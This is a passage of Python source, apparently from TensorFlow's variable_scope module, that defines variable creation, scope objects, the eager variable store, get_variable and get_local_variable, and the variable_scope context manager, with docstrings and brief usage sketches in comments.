found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer(dtype=dtype)
if shape is not None and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize the variable when no initializer is provided.
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTE: do we need dedicated handling for DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
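# Illustrative sketch (not part of the original module): how the defaults above
# surface through the public TF 1.x API. The variable names are assumptions.
#
#   import tensorflow as tf
#   with tf.variable_scope("defaults"):
#     w = tf.get_variable("w", shape=[3, 3])               # float -> glorot_uniform_initializer
#     c = tf.get_variable("c", shape=[3], dtype=tf.int32)  # int   -> zeros_initializer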
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
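# Minimal usage sketch (illustrative): `no_regularizer` lets a single variable
# opt out of a regularizer inherited from its scope. The l2 regularizer below
# is just one possible choice.
#
#   reg = tf.contrib.layers.l2_regularizer(0.1)
#   with tf.variable_scope("layer", regularizer=reg):
#     w = tf.get_variable("w", [4, 4])                              # regularized
#     b = tf.get_variable("b", [4], regularizer=tf.no_regularizer)  # not regularized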
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
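# Illustrative sketch: the collection helpers above filter the graph
# collections by this scope's name prefix.
#
#   with tf.variable_scope("net") as scope:
#     w = tf.get_variable("w", [2])
#   assert w in scope.trainable_variables()
#   assert w in scope.global_variables()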
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
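# Illustrative sketch: the returned scope object can be inspected or mutated,
# e.g. to switch the remainder of the block into reuse mode.
#
#   with tf.variable_scope("outer"):
#     v = tf.get_variable("v", [1])
#     tf.get_variable_scope().reuse_variables()
#     v_again = tf.get_variable("v", [1])  # returns the existing variable
#   assert v is v_again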
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled, Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
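# Illustrative sketch of `copy()` (assumes eager execution is enabled and that
# tf.layers is available): the copied store holds independent variables, so
# mutating them does not affect the originals.
#
#   container = EagerVariableStore()
#   with container.as_default():
#     y = tf.layers.dense(tf.zeros([1, 2]), 3, name="l1")
#   snapshot = container.copy()
#   snapshot.variables()[0].assign(tf.ones_like(snapshot.variables()[0]))
#   # container.variables()[0] is unchanged.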
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that just creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True`, `None`, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is not
self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
